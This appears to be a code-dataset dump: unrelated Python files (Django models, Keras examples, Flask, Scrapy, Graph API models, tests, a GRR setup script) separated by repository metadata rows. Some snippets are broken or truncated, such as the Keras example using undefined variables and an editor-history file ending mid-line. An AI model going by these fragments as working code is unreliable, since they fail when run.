class LinkDetailsOptions(models.Model):
detail_id = models.IntegerField()
detail_option_id = models.IntegerField()
spr_details_id = models.IntegerField()
class Meta:
db_table = 'link_details_options'
class LinkModelModules(models.Model):
model_id = models.IntegerField()
module_id = models.IntegerField()
class Meta:
db_table = 'link_model_modules'
class Models(models.Model):
id = models.IntegerField(primary_key=True)
name = models.CharField(max_length=255)
brand_id = models.IntegerField()
main_image = models.ImageField()
image = models.TextField()
class Meta:
db_table = 'models'
verbose_name_plural = "Модели"
class Partcodes(models.Model):
id = models.IntegerField(primary_key=True)
code = models.TextField()
description = models.TextField()
images = models.CharField(max_length=1500)
class Meta:
db_table = 'partcodes'
class SprDetailOptions(models.Model):
id = models.IntegerField(primary_key=True)
name = models.CharField(max_length=255)
icon = models.CharField(max_length=255)
class Meta:
db_table = 'spr_detail_options'
class SprDetails(models.Model):
id = models.IntegerField(primary_key=True)
name = models.TextField()
name_ru = models.TextField()
desc = models.TextField()
seo = models.TextField()
base_img = models.CharField(max_length=1500)
class Meta:
db_table = 'spr_details'
class SprModules(models.Model):
id = models.IntegerField(primary_key=True)
name = models.CharField(max_length=255)
name_ru = models.CharField(max_length=255)
description = models.CharField(max_length=1500)
scheme_picture = models.CharField(max_length=255)
class Meta:
db_table = 'spr_modules'
| [
"[email protected]"
] | |
223ba6282c9bc94c5ed8e642a43f151280243ba3 | bab8ce0d8b29292c8d6b0f2a6218b5ed84e7f98b | /account_cancel_with_reversal/tests/__init__.py | 658d50d7baed691aa4ea364101434b8fe6518ca1 | [] | no_license | ecosoft-odoo/ecosoft_v8 | 98e4116be3eceb287e2f3e9589d97155d5b8b745 | 71c56b0a102e340a5d80470243343654d8810955 | refs/heads/master | 2020-04-06T10:04:03.807855 | 2016-09-25T05:00:04 | 2016-09-25T05:00:04 | 51,049,848 | 2 | 2 | null | null | null | null | UTF-8 | Python | false | false | 132 | py | # -*- coding: utf-8 -*-
from . import test_account_move_reverse
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| [
"[email protected]"
] | |
418af46acc26ae85ca432a2ce3ae0866495c20ba | 68b64faeb8394817e202567bce7dfc21c3ec8656 | /com/jian/keras/sequential_module.py | 49f8ea3b17585f06f36592a33671ab98b0ba32cc | [] | no_license | tianjiansmile/ML_filght | 04248d5a1f4108defdcc626e5de5e68692b4f1de | d60b422ba12945e4875d47e7730d10b1d2193d03 | refs/heads/master | 2020-05-26T21:59:59.773474 | 2020-05-07T04:59:34 | 2020-05-07T04:59:34 | 188,387,929 | 1 | 3 | null | null | null | null | UTF-8 | Python | false | false | 4,878 | py | from keras.layers import Input
from keras.models import Model
from keras.models import Sequential
from keras.layers import Dense, Activation
import keras
# 全连接网络
# This returns a tensor
inputs = Input(shape=(784,))
# a layer instance is callable on a tensor, and returns a tensor
x = Dense(64, activation='relu')(inputs)
x = Dense(64, activation='relu')(x)
predictions = Dense(10, activation='softmax')(x)
# This creates a model that includes
# the Input layer and three Dense layers
model = Model(inputs=inputs, outputs=predictions)
# 编译
model.compile(optimizer='rmsprop',
loss='categorical_crossentropy',
metrics=['accuracy'])
# 训练
model.fit(data, labels) # starts training
# 全连接网络2
# 指定输入数据的shape
model = Sequential()
model.add(Dense(32, input_dim=784))
model = Sequential()
model.add(Dense(32, input_shape=(784,)))
model.add(Activation('relu'))
# 编译
# For a multi-class classification problem
model.compile(optimizer='rmsprop',
loss='categorical_crossentropy',
metrics=['accuracy'])
# 训练
# 二分类
model = Sequential()
model.add(Dense(32, activation='relu', input_dim=100))
model.add(Dense(1, activation='sigmoid'))
model.compile(optimizer='rmsprop',
loss='binary_crossentropy',
metrics=['accuracy'])
# Generate dummy data
import numpy as np
data = np.random.random((1000, 100))
labels = np.random.randint(2, size=(1000, 1))
# Train the model, iterating on the data in batches of 32 samples
model.fit(data, labels, epochs=10, batch_size=32)
# 多分类 (categorical classification):
model = Sequential()
model.add(Dense(32, activation='relu', input_dim=100))
model.add(Dense(10, activation='softmax'))
model.compile(optimizer='rmsprop',
loss='categorical_crossentropy',
metrics=['accuracy'])
# Generate dummy data
import numpy as np
data = np.random.random((1000, 100))
labels = np.random.randint(10, size=(1000, 1))
# Convert labels to categorical one-hot encoding
one_hot_labels = keras.utils.to_categorical(labels, num_classes=10)
# Train the model, iterating on the data in batches of 32 samples
model.fit(data, one_hot_labels, epochs=10, batch_size=32)
# 基于多层感知器的softmax多分类:
# Generate dummy data
from keras.layers import Dropout
from keras.optimizers import SGD
x_train = np.random.random((1000, 20))
y_train = keras.utils.to_categorical(np.random.randint(10, size=(1000, 1)), num_classes=10)
x_test = np.random.random((100, 20))
y_test = keras.utils.to_categorical(np.random.randint(10, size=(100, 1)), num_classes=10)
model = Sequential()
# Dense(64) is a fully-connected layer with 64 hidden units.
# in the first layer, you must specify the expected input data shape:
# here, 20-dimensional vectors.
model.add(Dense(64, activation='relu', input_dim=20))
model.add(Dropout(0.5))
model.add(Dense(64, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(10, activation='softmax'))
sgd = SGD(lr=0.01, decay=1e-6, momentum=0.9, nesterov=True)
model.compile(loss='categorical_crossentropy',
optimizer=sgd,
metrics=['accuracy'])
model.fit(x_train, y_train,
epochs=20,
batch_size=128)
score = model.evaluate(x_test, y_test, batch_size=128)
# 卷积神经网络
from keras.models import Sequential
from keras.layers import Dense, Dropout, Flatten
from keras.layers import Conv2D, MaxPooling2D
from keras.optimizers import SGD
# Generate dummy data
x_train = np.random.random((100, 100, 100, 3))
y_train = keras.utils.to_categorical(np.random.randint(10, size=(100, 1)), num_classes=10)
x_test = np.random.random((20, 100, 100, 3))
y_test = keras.utils.to_categorical(np.random.randint(10, size=(20, 1)), num_classes=10)
model = Sequential()
# input: 100x100 images with 3 channels -> (100, 100, 3) tensors.
# 二维卷积层,即对图像的空域卷积。该层对二维输入进行滑动窗卷积,当使用该层作为第一层时,
# 应提供input_shape参数。例如input_shape = (100,100,3)代表100*100的彩色RGB图像
# 32个 convolution filters 每一个 size 3x3 each.
model.add(Conv2D(32, (3, 3), activation='relu', input_shape=(100, 100, 3)))
model.add(Conv2D(32, (3, 3), activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dropout(0.25))
model.add(Conv2D(64, (3, 3), activation='relu'))
model.add(Conv2D(64, (3, 3), activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dropout(0.25))
model.add(Flatten())
model.add(Dense(256, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(10, activation='softmax'))
sgd = SGD(lr=0.01, decay=1e-6, momentum=0.9, nesterov=True)
model.compile(loss='categorical_crossentropy', optimizer=sgd)
model.fit(x_train, y_train, batch_size=32, epochs=10)
score = model.evaluate(x_test, y_test, batch_size=32)
| [
"[email protected]"
] | |
b321d4867fffc42d14b955f41cfad9b8315c7d46 | 9206651d6b1acb483040dff19929851ce261bc73 | /src/lecture4/notes/classes3.py | 8403a8d3951fba3134667204a5528af74aff4485 | [] | no_license | Farooq-azam-khan/web-programming-with-python-and-javascript | eee8556b37b8f8bb4f420ce9d4949441fbf456dd | 0875982ecbbb2bfd37e7b41a09a43623ee6d5a96 | refs/heads/master | 2022-12-10T15:31:39.703121 | 2018-07-18T06:51:02 | 2018-07-18T06:51:02 | 138,975,972 | 0 | 0 | null | 2022-12-08T02:12:59 | 2018-06-28T06:29:26 | HTML | UTF-8 | Python | false | false | 627 | py | class Flight:
def __init__(self, origin, destination, duration):
self.origin = origin
self.destination = destination
self.duration = duration
def print_info(self):
print(f"origin: {self.origin}")
print(f"destination: {self.destination}")
print(f"duration: {self.duration}")
def delay(self, amount):
self.duration += amount
def main():
f1 = Flight("New York", "Paris", 500)
f2 = Flight("Toronto", "Paris", 400)
f1.print_info()
f1.delay(10)
f1.print_info()
if __name__ == '__main__':
main() | [
"[email protected]"
] | |
df1c11b2140c9abaa45d0d6347c2d2721cc4c3ed | 8a73cde463081afd76427d5af1e6837bfa51cc47 | /harvester/edurep/tests/harvest_metadata_command.py | 7130625099872e671ff9870ad67d353dce224021 | [
"MIT"
] | permissive | surfedushare/search-portal | 8af4103ec6464e255c5462c672b30f32cd70b4e1 | 63e30ad0399c193fcb686804062cedf3930a093c | refs/heads/acceptance | 2023-06-25T13:19:41.051801 | 2023-06-06T13:37:01 | 2023-06-06T13:37:01 | 254,373,874 | 2 | 1 | MIT | 2023-06-06T12:04:44 | 2020-04-09T13:07:12 | Python | UTF-8 | Python | false | false | 2,105 | py | from core.tests.commands.harvest_metadata import TestMetadataHarvest, TestMetadataHarvestWithHistory
from core.constants import Repositories
from core.models import HarvestSource, Collection, Extension
from edurep.tests.factories import EdurepOAIPMHFactory
class TestMetadataHarvestEdurep(TestMetadataHarvest):
spec_set = "surfsharekit"
repository = Repositories.EDUREP
@classmethod
def setUpClass(cls):
super().setUpClass()
EdurepOAIPMHFactory.create_common_edurep_responses()
sharekit = HarvestSource.objects.get(id=1)
sharekit.repository = cls.repository
sharekit.spec = cls.spec_set
sharekit.save()
other = HarvestSource.objects.get(id=2)
other.repository = cls.repository
other.save()
extension = Extension.objects.get(id="5af0e26f-c4d2-4ddd-94ab-7dd0bd531751")
extension.id = extension.reference = "surfsharekit:oai:surfsharekit.nl:5af0e26f-c4d2-4ddd-94ab-7dd0bd531751"
extension.save()
class TestMetadataHarvestWithHistoryEdurep(TestMetadataHarvestWithHistory):
spec_set = "surfsharekit"
repository = Repositories.EDUREP
@classmethod
def setUpClass(cls):
super().setUpClass()
EdurepOAIPMHFactory.create_common_edurep_responses(include_delta=True)
sharekit = HarvestSource.objects.get(id=1)
sharekit.repository = cls.repository
sharekit.spec = cls.spec_set
sharekit.save()
other = HarvestSource.objects.get(id=2)
other.repository = cls.repository
other.save()
collection = Collection.objects.get(id=171)
collection.name = cls.spec_set
collection.save()
collection.documents \
.filter(properties__title="Using a Vortex | Wageningen UR") \
.update(reference="surfsharekit:oai:surfsharekit.nl:5be6dfeb-b9ad-41a8-b4f5-94b9438e4257")
collection.documents \
.filter(reference="5af0e26f-c4d2-4ddd-94ab-7dd0bd531751") \
.update(reference="surfsharekit:oai:surfsharekit.nl:5af0e26f-c4d2-4ddd-94ab-7dd0bd531751")
| [
"[email protected]"
] | |
ff86cf6de6529af0927862b17044cc444dd5d4b6 | a7288d7cce714ce3ddf3de464f959a2cb6c62e80 | /Flask/Validation/server.py | 53b50278ff6439f50a7c5be10f3f8892f29e1ddb | [] | no_license | jhflorey/Python | 94d898c9cfa05a941e0ac0c3506587ad494b76ab | 4d005000bb95ee4414a6aebef4cebdcbc13e4d99 | refs/heads/master | 2020-03-20T10:44:00.560147 | 2018-06-14T16:48:49 | 2018-06-14T16:48:49 | 137,382,015 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 460 | py | from flask import Flask, render_template, redirect, request, session, flash
app = Flask(__name__)
app.secret_key = 'JessicaSecret'
@app.route('/')
def index():
return render_template('index.html')
@app.route('/process', methods=['POST'])
def process():
if len(request.form['name']) < 1:
flash("Name can't be empty!")
else:
print("Success! Your name is {}".format(request.form['name']))
return redirect('/')
app.run(debug=True) | [
"[email protected]"
] | |
1ae7147831e43416858f5a4d9cb8bb2156ed809b | 1ecde4178548f331f15717f245e3f657b58b9993 | /cyh_crawler/scrapySchool_England/scrapySchool_England/scrapySchool_England/main.py | 6a991c45461505cc2e4750caeff9610eac4cade2 | [] | no_license | gasbarroni8/python_spider | 296dcb7c3fd9dd028423fe5ec0a321d994478b15 | 7935fa462926bc8ea9bf9883bd15265dd0d3e6df | refs/heads/master | 2023-03-26T05:22:59.858422 | 2019-04-15T07:17:56 | 2019-04-15T07:17:56 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,495 | py | from scrapy import cmdline
# cmdline.execute("scrapy crawl SwanseaUniversityPrifysgolAbertawe_U".split())
# cmdline.execute("scrapy crawl SwanseaUniversityPrifysgolAbertawe_P".split())
# cmdline.execute('scray crawl gaokao'.split())
# cmdline.execute('scrapy crawl picture'.split())
# cmdline.execute('scrapy crawl UniversityOfSouthampton_P'.split())
# cmdline.execute('scrapy crawl UniversityOfStAndrews_P'.split())
# cmdline.execute('scrapy crawl UniversityOfGlasgow_P'.split())
cmdline.execute('scrapy crawl UniversityOfTheArtsLondon_P'.split())
# cmdline.execute('scrapy crawl UniversityOfOxford_P'.split())
# cmdline.execute('scrapy crawl DeMontfortUniversity_P'.split())
# cmdline.execute('scrapy crawl BrunelUniversityLondon_P'.split())
# cmdline.execute('scrapy crawl HarperAdamsUniveristy_P'.split())
# cmdline.execute('scrapy crawl UniversityOfStirling_P'.split())
# cmdline.execute('scrapy crawl CoventryUniversity_P'.split())
# cmdline.execute('scrapy crawl CityUniversityOfLondon_P'.split())
# cmdline.execute('scrapy crawl UniversityOfLiverpool_P'.split())
# cmdline.execute('scrapy crawl UniversityCollegeLondon_P'.split())
# cmdline.execute('scrapy crawl UniversityOfYork_P'.split())
# cmdline.execute('scrapy crawl DurhamUniversity_P'.split())
# cmdline.execute('scrapy crawl LondonSouthBankUniversity_P'.split())
# cmdline.execute('scrapy crawl ManchesterMetropolitanUniversity_P'.split())
# cmdline.execute('scrapy crawl MiddlesexUniversity_P'.split())
# cmdline.execute('scrapy crawl NewmanUniversity_P'.split())
# cmdline.execute('scrapy crawl NorthumbriaUniversity_P'.split())
# cmdline.execute('scrapy crawl NorwichUniversityoftheArts_P'.split())
# cmdline.execute('scrapy crawl OxfordBrookesUniversity_P'.split())
# cmdline.execute('scrapy crawl QueenMargaretUniversity_P'.split())
# cmdline.execute('scrapy crawl LiverpoolJohnMooresUniversity_P'.split())
# cmdline.execute('scrapy crawl LeedsBeckettUniversity_P'.split())
# cmdline.execute('scrapy crawl LeedsTrinityUniversity_P'.split())
# cmdline.execute('scrapy crawl StMaryUniversityTwickenham_P'.split())
# cmdline.execute('scrapy crawl StaffordshireUniversity_P'.split())
# cmdline.execute('scrapy crawl UlsterUniversity_P'.split())
# cmdline.execute('scrapy crawl UniversityForTheCreativeArts_P'.split())
# cmdline.execute('scrapy crawl AngliaRuskinUniversity_P'.split())
# cmdline.execute('scrapy crawl UniversityofBedfordshire_P'.split())
# cmdline.execute('scrapy crawl UniversityOfLeicester_P'.split()) | [
"[email protected]"
] | |
053fc23b9d1e676b148f8576250daae9dab76e85 | dfdb672bbe3b45175806928d7688a5924fc45fee | /Learn Python the Hard Way Exercises/ex6.py | bdc6a5f9f598451b3b7f4b3ccb790c295a9908c5 | [] | no_license | mathans1695/Python-Practice | bd567b5210a4d9bcd830607627293d64b4baa909 | 3a8fabf14bc65b8fe973488503f12fac224a44ed | refs/heads/master | 2023-01-01T13:49:05.789809 | 2020-10-26T02:37:05 | 2020-10-26T02:37:05 | 306,300,672 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 394 | py | x = "There are %d types of people." % 10
binary = "binary"
do_not = "don't"
y = "Those who know %s and those who %s." % (binary, do_not)
print x
print y
print "I said: %r." % x
print "I also said: '%s'." % y
hilarious = 0
joke_evaluation = "Isn't that joke so funny?! %s"
print joke_evaluation % hilarious
w = "This is the left side of..."
e = "a string with a right side."
print w + e
| [
"[email protected]"
] | |
62f623a3627d7ac22b6f30c255b956e2e37f1f30 | 1515be3015ad988278d5a095416c0a0066a02757 | /src/users/models/componentsschemasmicrosoft_graph_windowsdevicemalwarestateallof1.py | 31ab5b0ad3a8ead943f9d1569c1e9baa891b4228 | [
"MIT"
] | permissive | peombwa/Sample-Graph-Python-Client | 2ad494cc5b5fe026edd6ed7fee8cac2dd96aaa60 | 3396f531fbe6bb40a740767c4e31aee95a3b932e | refs/heads/master | 2020-12-29T09:50:38.941350 | 2020-02-05T22:45:28 | 2020-02-05T22:45:28 | 238,561,578 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,670 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class ComponentsschemasmicrosoftGraphWindowsdevicemalwarestateallof1(Model):
"""windowsDeviceMalwareState.
Malware detection entity.
:param display_name: Malware name
:type display_name: str
:param additional_information_url: Information URL to learn more about the
malware
:type additional_information_url: str
:param severity: Possible values include: 'unknown', 'low', 'moderate',
'high', 'severe'
:type severity: str or ~users.models.enum
:param catetgory: Possible values include: 'invalid', 'adware', 'spyware',
'passwordStealer', 'trojanDownloader', 'worm', 'backdoor',
'remoteAccessTrojan', 'trojan', 'emailFlooder', 'keylogger', 'dialer',
'monitoringSoftware', 'browserModifier', 'cookie', 'browserPlugin',
'aolExploit', 'nuker', 'securityDisabler', 'jokeProgram',
'hostileActiveXControl', 'softwareBundler', 'stealthNotifier',
'settingsModifier', 'toolBar', 'remoteControlSoftware', 'trojanFtp',
'potentialUnwantedSoftware', 'icqExploit', 'trojanTelnet', 'exploit',
'filesharingProgram', 'malwareCreationTool', 'remote_Control_Software',
'tool', 'trojanDenialOfService', 'trojanDropper', 'trojanMassMailer',
'trojanMonitoringSoftware', 'trojanProxyServer', 'virus', 'known',
'unknown', 'spp', 'behavior', 'vulnerability', 'policy',
'enterpriseUnwantedSoftware', 'ransom', 'hipsRule'
:type catetgory: str or ~users.models.enum
:param execution_state: Possible values include: 'unknown', 'blocked',
'allowed', 'running', 'notRunning'
:type execution_state: str or ~users.models.enum
:param state: Possible values include: 'unknown', 'detected', 'cleaned',
'quarantined', 'removed', 'allowed', 'blocked', 'cleanFailed',
'quarantineFailed', 'removeFailed', 'allowFailed', 'abandoned',
'blockFailed'
:type state: str or ~users.models.enum
:param threat_state: Possible values include: 'active', 'actionFailed',
'manualStepsRequired', 'fullScanRequired', 'rebootRequired',
'remediatedWithNonCriticalFailures', 'quarantined', 'removed', 'cleaned',
'allowed', 'noStatusCleared'
:type threat_state: str or ~users.models.enum
:param initial_detection_date_time: Initial detection datetime of the
malware
:type initial_detection_date_time: datetime
:param last_state_change_date_time: The last time this particular threat
was changed
:type last_state_change_date_time: datetime
:param detection_count: Number of times the malware is detected
:type detection_count: int
:param category: Possible values include: 'invalid', 'adware', 'spyware',
'passwordStealer', 'trojanDownloader', 'worm', 'backdoor',
'remoteAccessTrojan', 'trojan', 'emailFlooder', 'keylogger', 'dialer',
'monitoringSoftware', 'browserModifier', 'cookie', 'browserPlugin',
'aolExploit', 'nuker', 'securityDisabler', 'jokeProgram',
'hostileActiveXControl', 'softwareBundler', 'stealthNotifier',
'settingsModifier', 'toolBar', 'remoteControlSoftware', 'trojanFtp',
'potentialUnwantedSoftware', 'icqExploit', 'trojanTelnet', 'exploit',
'filesharingProgram', 'malwareCreationTool', 'remote_Control_Software',
'tool', 'trojanDenialOfService', 'trojanDropper', 'trojanMassMailer',
'trojanMonitoringSoftware', 'trojanProxyServer', 'virus', 'known',
'unknown', 'spp', 'behavior', 'vulnerability', 'policy',
'enterpriseUnwantedSoftware', 'ransom', 'hipsRule'
:type category: str or ~users.models.enum
"""
_validation = {
'detection_count': {'maximum': 2147483647, 'minimum': -2147483648},
}
_attribute_map = {
'display_name': {'key': 'displayName', 'type': 'str'},
'additional_information_url': {'key': 'additionalInformationUrl', 'type': 'str'},
'severity': {'key': 'severity', 'type': 'str'},
'catetgory': {'key': 'catetgory', 'type': 'str'},
'execution_state': {'key': 'executionState', 'type': 'str'},
'state': {'key': 'state', 'type': 'str'},
'threat_state': {'key': 'threatState', 'type': 'str'},
'initial_detection_date_time': {'key': 'initialDetectionDateTime', 'type': 'iso-8601'},
'last_state_change_date_time': {'key': 'lastStateChangeDateTime', 'type': 'iso-8601'},
'detection_count': {'key': 'detectionCount', 'type': 'int'},
'category': {'key': 'category', 'type': 'str'},
}
def __init__(self, display_name=None, additional_information_url=None, severity=None, catetgory=None, execution_state=None, state=None, threat_state=None, initial_detection_date_time=None, last_state_change_date_time=None, detection_count=None, category=None):
super(ComponentsschemasmicrosoftGraphWindowsdevicemalwarestateallof1, self).__init__()
self.display_name = display_name
self.additional_information_url = additional_information_url
self.severity = severity
self.catetgory = catetgory
self.execution_state = execution_state
self.state = state
self.threat_state = threat_state
self.initial_detection_date_time = initial_detection_date_time
self.last_state_change_date_time = last_state_change_date_time
self.detection_count = detection_count
self.category = category
| [
"[email protected]"
] | |
7cd31f6504ec6f2a009af57d51a4d7882dc91bc5 | 27398b2a8ed409354d6a36c5e1d2089dad45b4ac | /tests/common/models/test_token.py | 8bdba91a77d0c587046d5ccedb7bbbd587801a7c | [
"Apache-2.0"
] | permissive | amar266/ceph-lcm | e0d6c1f825f5ac07d2926bfbe6871e760b904340 | 6b23ffd5b581d2a1743c0d430f135261b7459e38 | refs/heads/master | 2021-04-15T04:41:55.950583 | 2018-03-23T12:51:26 | 2018-03-23T12:51:26 | 126,484,605 | 0 | 0 | null | 2018-03-23T12:50:28 | 2018-03-23T12:50:27 | null | UTF-8 | Python | false | false | 2,667 | py | # -*- coding: utf-8 -*-
# Copyright (c) 2016 Mirantis Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This module contains tests for decapod_common.models.token."""
import pytest
from decapod_common.models import token
def test_create_token_in_db(configure_model, pymongo_connection, freeze_time):
user_id = pytest.faux.gen_uuid()
new_token = token.TokenModel.create(user_id)
db_token = pymongo_connection.db.token.find_one({"_id": new_token._id})
assert db_token
assert new_token.user_id == db_token["user_id"]
assert new_token.expires_at == db_token["expires_at"]
assert new_token.model_id == db_token["model_id"]
assert new_token.initiator_id == db_token["initiator_id"]
assert new_token.version == db_token["version"]
assert new_token.initiator_id == db_token["initiator_id"]
assert new_token.time_created == db_token["time_created"]
assert new_token.time_deleted == db_token["time_deleted"]
current_time = int(freeze_time.return_value)
assert new_token.time_created == current_time
assert not new_token.time_deleted
assert new_token.initiator_id == new_token.user_id
assert int(new_token.expires_at.timestamp()) \
== current_time + new_token.default_ttl
def test_create_token_different(configure_model):
user_id = pytest.faux.gen_uuid()
new_token1 = token.TokenModel.create(user_id)
new_token2 = token.TokenModel.create(user_id)
assert new_token1.expires_at == new_token2.expires_at
assert new_token1.version == new_token2.version
assert new_token1._id != new_token2._id
def test_token_api_specific_fields(configure_model):
new_token = token.TokenModel.create(pytest.faux.gen_uuid())
api = new_token.make_api_structure()
assert api == {
"id": str(new_token.model_id),
"model": token.TokenModel.MODEL_NAME,
"initiator_id": new_token.initiator_id,
"time_deleted": new_token.time_deleted,
"time_updated": new_token.time_created,
"version": new_token.version,
"data": {
"expires_at": int(new_token.expires_at.timestamp()),
"user": None
}
}
| [
"[email protected]"
] | |
1d6d4abe45b478740b0a9a93148f268895c3f441 | 20a0bd0a9675f52d4cbd100ee52f0f639fb552ef | /transit_odp/pipelines/receivers.py | 1a5817d416f6c9c4c2c8269a5f55a6e304ca1274 | [] | no_license | yx20och/bods | 2f7d70057ee9f21565df106ef28dc2c4687dfdc9 | 4e147829500a85dd1822e94a375f24e304f67a98 | refs/heads/main | 2023-08-02T21:23:06.066134 | 2021-10-06T16:49:43 | 2021-10-06T16:49:43 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,992 | py | import celery
from django.db import transaction
from django.dispatch import receiver
from transit_odp.data_quality.tasks import task_dqs_download, task_dqs_report_etl
from transit_odp.organisation.constants import FeedStatus
from transit_odp.organisation.models import DatasetRevision
from transit_odp.organisation.receivers import logger
from transit_odp.pipelines.models import DataQualityTask
from transit_odp.pipelines.signals import dataset_changed, dataset_etl, dqs_report_etl
from transit_odp.timetables.tasks import task_dataset_pipeline
@receiver(dataset_etl)
def dataset_etl_handler(sender, revision: DatasetRevision, **kwargs):
"""
Listens on the feed_index and dispatches a Celery job to process the feed payload
"""
logger.debug(f"index_feed_handler called for DatasetRevision {revision.id}")
if not revision.status == FeedStatus.pending.value:
revision.to_pending()
revision.save()
# Trigger task once transactions have been fully committed
transaction.on_commit(lambda: task_dataset_pipeline.delay(revision.id))
@receiver(dqs_report_etl)
def dqs_report_etl_handler(sender, task: DataQualityTask, **kwargs):
"""
Listens on the dqs_report_etl and dispatches a Celery job chain to
process the ready DQS report
"""
logger.debug(
f"dqs_report_etl_handler called for "
f"DataQualityTask(id={task.id}, task_id={task.task_id})"
)
# Chain Celery tasks: download the report and then run ETL pipeline
transaction.on_commit(
lambda: celery.chain(task_dqs_download.s(task.id), task_dqs_report_etl.s())()
)
@receiver(dataset_changed)
def dataset_changed_handler(sender, revision: DatasetRevision, **kwargs):
"""
Listens on the task_dataset_etl and dispatches a Celery job to publish the revision
"""
logger.debug(f"dataset_changed called for DatasetRevision {revision.id}")
task_dataset_pipeline.apply_async(args=(revision.id,), kwargs={"do_publish": True})
| [
"[email protected]"
] | |
98f5ca074dd68ca76c524fdf9067f24985046436 | e262e64415335060868e9f7f73ab8701e3be2f7b | /.history/Test002/数据类型_20201205162829.py | 4ad60fe9cb60917905bd6b19edde771ad9404d47 | [] | no_license | Allison001/developer_test | 6e211f1e2bd4287ee26fd2b33baf1c6a8d80fc63 | b8e04b4b248b0c10a35e93128a5323165990052c | refs/heads/master | 2023-06-18T08:46:40.202383 | 2021-07-23T03:31:54 | 2021-07-23T03:31:54 | 322,807,303 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 231 | py | fruits = ['orange', 'apple', 'pear', 'banana', 'kiwi', 'apple', 'banana']
# print(fruits.count("apple"))
# a = fruits.index("banana",4)
# print(a)
# fruits.reverse()
# print(fruits)
# fruits.append("daka")
# print(fruits)
a= r | [
"[email protected]"
] | |
500721d9011e251f5c83a5f683e8b128ba5cca62 | 6c6cf32f72c33c78ce07771328f5368564ebde5c | /autox/process_data/feature_type_recognition.py | 302050a7b24e1e9654829b4b776cb113400dc69d | [
"Apache-2.0"
] | permissive | emg110/AutoX | 9f3fdce5602eef7e1dc8ec99e0e60c3236da43d1 | 26eb6bea33b8e8428ee1afcd4403ccae2948724e | refs/heads/master | 2023-07-27T20:43:32.818251 | 2021-09-10T11:10:12 | 2021-09-10T11:10:12 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,769 | py | import pandas as pd
import datetime
from autox.CONST import FEATURE_TYPE
# datetime的表现形式为:2015-08-28 16:43:37.283
# timestamp的表现形式为:1440751417.283
def detect_TIMESTAMP(df, col):
try:
ts_min = int(float(df.loc[~(df[col] == '') & (df[col].notnull()), col].min()))
ts_max = int(float(df.loc[~(df[col] == '') & (df[col].notnull()), col].max()))
datetime_min = datetime.datetime.utcfromtimestamp(ts_min).strftime('%Y-%m-%d %H:%M:%S')
datetime_max = datetime.datetime.utcfromtimestamp(ts_max).strftime('%Y-%m-%d %H:%M:%S')
if datetime_min > '2000-01-01 00:00:01' and datetime_max < '2030-01-01 00:00:01' and datetime_max > datetime_min:
return True
except:
return False
def detect_DATETIME(df, col):
is_DATETIME = False
if df[col].dtypes == 'object':
is_DATETIME = True
try:
pd.to_datetime(df[col])
except:
is_DATETIME = False
return is_DATETIME
def get_data_type(df, col):
if detect_DATETIME(df, col):
return FEATURE_TYPE['datetime']
if detect_TIMESTAMP(df, col):
return FEATURE_TYPE['timestamp']
if df[col].dtypes == object or df[col].dtypes == bool or str(df[col].dtypes) == 'category':
return FEATURE_TYPE['cat']
if 'int' in str(df[col].dtype) or 'float' in str(df[col].dtype):
return FEATURE_TYPE['num']
class Feature_type_recognition():
def __init__(self):
self.df = None
self.feature_type = None
def fit(self, df):
self.df = df
self.feature_type = {}
for col in self.df.columns:
cur_type = get_data_type(self.df, col)
self.feature_type[col] = cur_type
return self.feature_type
| [
"[email protected]"
] | |
801b1698f76fd72430f6d4989a09735ae2002cce | e3c8f786d09e311d6ea1cab50edde040bf1ea988 | /Incident-Response/Tools/grr/grr/core/setup.py | c626095353055c7ac3288b16e37e0f43901a514b | [
"MIT",
"Apache-2.0"
] | permissive | foss2cyber/Incident-Playbook | d1add8aec6e28a19e515754c6ce2e524d67f368e | a379a134c0c5af14df4ed2afa066c1626506b754 | refs/heads/main | 2023-06-07T09:16:27.876561 | 2021-07-07T03:48:54 | 2021-07-07T03:48:54 | 384,988,036 | 1 | 0 | MIT | 2021-07-11T15:45:31 | 2021-07-11T15:45:31 | null | UTF-8 | Python | false | false | 4,697 | py | #!/usr/bin/env python
"""Setup configuration for the python grr modules."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import configparser
import itertools
import os
import shutil
import subprocess
import sys
from setuptools import Extension
from setuptools import find_packages
from setuptools import setup
from setuptools.command.develop import develop
from setuptools.command.install import install
from setuptools.command.sdist import sdist
THIS_DIRECTORY = os.path.dirname(os.path.realpath(__file__))
os.chdir(THIS_DIRECTORY)
def find_data_files(source, ignore_dirs=None):
ignore_dirs = ignore_dirs or []
result = []
for directory, dirnames, files in os.walk(source):
dirnames[:] = [d for d in dirnames if d not in ignore_dirs]
files = [os.path.join(directory, x) for x in files]
result.append((directory, files))
return result
def sync_artifacts():
"""Sync the artifact repo with upstream for distribution."""
subprocess.check_call([sys.executable, "makefile.py"],
cwd="grr_response_core/artifacts")
def get_config():
"""Get INI parser with version.ini data."""
ini_path = os.path.join(THIS_DIRECTORY, "version.ini")
if not os.path.exists(ini_path):
ini_path = os.path.join(THIS_DIRECTORY, "../../version.ini")
if not os.path.exists(ini_path):
raise RuntimeError("Couldn't find version.ini")
config = configparser.ConfigParser()
config.read(ini_path)
return config
VERSION = get_config()
class Develop(develop):
